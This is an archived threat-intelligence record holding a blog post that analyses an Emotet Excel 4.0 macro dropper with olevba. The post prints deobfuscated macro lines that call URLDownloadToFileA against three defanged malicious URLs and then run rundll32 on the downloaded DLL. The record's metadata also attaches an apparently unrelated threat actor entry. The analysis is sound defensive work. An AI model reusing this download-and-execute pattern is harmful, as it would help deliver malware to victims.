{
	"id": "149c94ec-18c2-49da-bcbd-e1be8643afc3",
	"created_at": "2026-04-06T00:06:42.738297Z",
	"updated_at": "2026-04-10T03:30:33.123769Z",
	"deleted_at": null,
	"sha1_hash": "c3132775048bc9d3c7a7553dff0d9a0a9bd32908",
	"title": "Emotet’s Excel 4.0 Macros Dropping DLLs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 54211,
	"plain_text": "Emotet’s Excel 4.0 Macros Dropping DLLs\r\nPublished: 2022-01-17 · Archived: 2026-04-05 15:38:36 UTC\r\nIt’s been a little while since I checked in on Emotet to see how its first stage loaders are doing. Lately the first stage has been using Excel 4.0 macros to drop payloads, so in this post I’ll walk through the analysis of one Emotet Excel document. If you want to play along at home, I’m working with this sample in MalwareBazaar:\r\nhttps://bazaar.abuse.ch/sample/1a243db583013a6999761dad88d6952351fdc2cd17d2016990276a9dd11ac90b/\r\nTriaging the File\r\nAs always, we should confirm our filetype first. Let’s give it a go using file, xxd, and head.\r\nremnux@remnux:~/cases/emotet$ file nn30.xlsm\r\nnn30.xlsm: Microsoft Excel 2007+\r\nremnux@remnux:~/cases/emotet$ xxd nn30.xlsm | head\r\n00000000: 504b 0304 1400 0600 0800 0000 2100 a78b PK..........!...\r\n00000010: 2b33 c901 0000 9707 0000 1300 0802 5b43 +3............[C\r\n00000020: 6f6e 7465 6e74 5f54 7970 6573 5d2e 786d ontent_Types].xm\r\n00000030: 6c20 a204 0228 a000 0200 0000 0000 0000 l ...(..........\r\n00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000070: 0000 0000 0000 0101 0000 0000 0000 0000 ................\r\n00000080: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000090: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\nThe file output says the file magic belongs to an Excel document, and the first few bytes are what I’d expect from an Excel document. The PK part of the magic is common to zip archives as well, and an Excel XLSX document is itself a zip archive. The string [Content_Types].xml refers to the filename of one of the XML files that make up a larger Excel document. If you unzip an XLSX file, you’ll find one of those files in the extracted content. All told, this is consistent with an Excel doc.\r\nAnalyzing the Document\r\nA good starting point for the analysis is olevba.\r\nremnux@remnux:~/cases/emotet$ olevba nn30.xlsm\r\nolevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools\r\n===============================================================================\r\nFILE: nn30.xlsm\r\nType: OpenXML\r\n-------------------------------------------------------------------------------\r\nVBA MACRO xlm_macro.txt\r\nin file: xlm_macro - OLE stream: 'xlm_macro'\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n' RAW EXCEL4/XLM MACRO FORMULAS:\r\n' SHEET: EWDFFEFAD, Macrosheet\r\n' CELL:E13, =FORMULA(Srieifew1!E2,E16)=FORMULA(Buuk1!P22\u0026Buuk1!H9\u0026Buuk1!L2\u0026Buuk1!B15\u0026Buuk1!B15\u0026Srieifew1!B10\u0026Srieifew1!D6\u0026Sr\r\n' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n' EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS:\r\n' CELL:E13 , FullEvaluation , False\r\n' CELL:E18 , FullEvaluation , CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"hxxps://zml.laneso.com/packet/AlvJ8Od\r\n' CELL:E20 , FullEvaluation , IF(YHYH\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"hxxp://ostadsarma.com/wp-ad\r\n' CELL:E22 , FullEvaluation , IF(YHYH1\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"hxxp://govtjobresultbd.xy\r\n' CELL:E24 , FullEvaluation , IF(YHYH2\u003c0,CLOSE(0),)\r\n' CELL:E26 , PartialEvaluation , =EXEC(\"C:\\Windows\\SysWow64\\rundll32.exe ..\\erum.ocx,D\"\"\u0026\"\"l\"\"\u0026\"\"lR\"\"\u0026\"\"egister\"\"\u0026\"\"\r\n' CELL:E32 , FullEvaluation , RETURN()\r\n+----------+--------------------+---------------------------------------------+\r\n|Type |Keyword |Description |\r\n+----------+--------------------+---------------------------------------------+\r\n|Suspicious|CALL |May call a DLL using Excel 4 Macros (XLM/XLF)|\r\n|Suspicious|Windows |May enumerate application windows (if |\r\n| | |combined with Shell.Application object) |\r\n|Suspicious|URLDownloadToFileA |May download files from the Internet |\r\n|Suspicious|EXEC |May run an executable file or a system |\r\n| | |command using Excel 4 Macros (XLM/XLF) |\r\n|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |\r\n| | |used to obfuscate strings (option --decode to|\r\n| | |see all) |\r\n|IOC |hxxps://zml.laneso.c|URL |\r\n| |om/packet/AlvJ8OdtSY| |\r\n| |EeeCQP/ | |\r\n|IOC |hxxp://ostadsarma.co|URL |\r\n| |m/wp-admin/JNgASjNC/| |\r\n|IOC |hxxp://govtjobresult|URL |\r\n| |bd.xyz/sjjz/UIUhOHsL| |\r\n| |qjOy9/ | |\r\n|IOC |rundll32.exe |Executable file name |\r\n|Suspicious|XLM macro |XLM macro found. It may contain malicious |\r\n| | |code |\r\n+----------+--------------------+---------------------------------------------+\r\nInterpreting the output, it looks like the document has Excel 4.0 macros that download content from these URLs:\r\nhxxps://zml.laneso[.]com/packet/AlvJ8OdtSYEeeCQP/\r\nhxxp://ostadsarma[.]com/wp-admin/JNgASjNC/\r\nhxxp://govtjobresultbd[.]xyz/sjjz/UIUhOHsLqjOy9/\r\nUsing the URLDownloadToFileA function from urlmon.dll, the document saved the downloaded content to erum.ocx.\r\nAfterward, the document proceeded to execute C:\\Windows\\SysWow64\\rundll32.exe ..\\erum.ocx,D\"\u0026\"l\"\u0026\"lR\"\u0026\"egister\"\u0026\"Serve\"\u0026\"r. The obfuscation on the DLL export reduces to DllRegisterServer. So the process ancestry becomes excel.exe -\u003e rundll32.exe erum.ocx,DllRegisterServer.\r\nWe can confirm this by looking at a sandbox report from Tria.ge here: https://tria.ge/220115-mqldpsdhb7/behavioral1.\r\nThanks for reading!\r\nSource: https://forensicitguy.github.io/emotet-excel4-macro-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://forensicitguy.github.io/emotet-excel4-macro-analysis/"
	],
	"report_names": [
		"emotet-excel4-macro-analysis"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434002,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c3132775048bc9d3c7a7553dff0d9a0a9bd32908.pdf",
		"text": "https://archive.orkl.eu/c3132775048bc9d3c7a7553dff0d9a0a9bd32908.txt",
		"img": "https://archive.orkl.eu/c3132775048bc9d3c7a7553dff0d9a0a9bd32908.jpg"
	}
}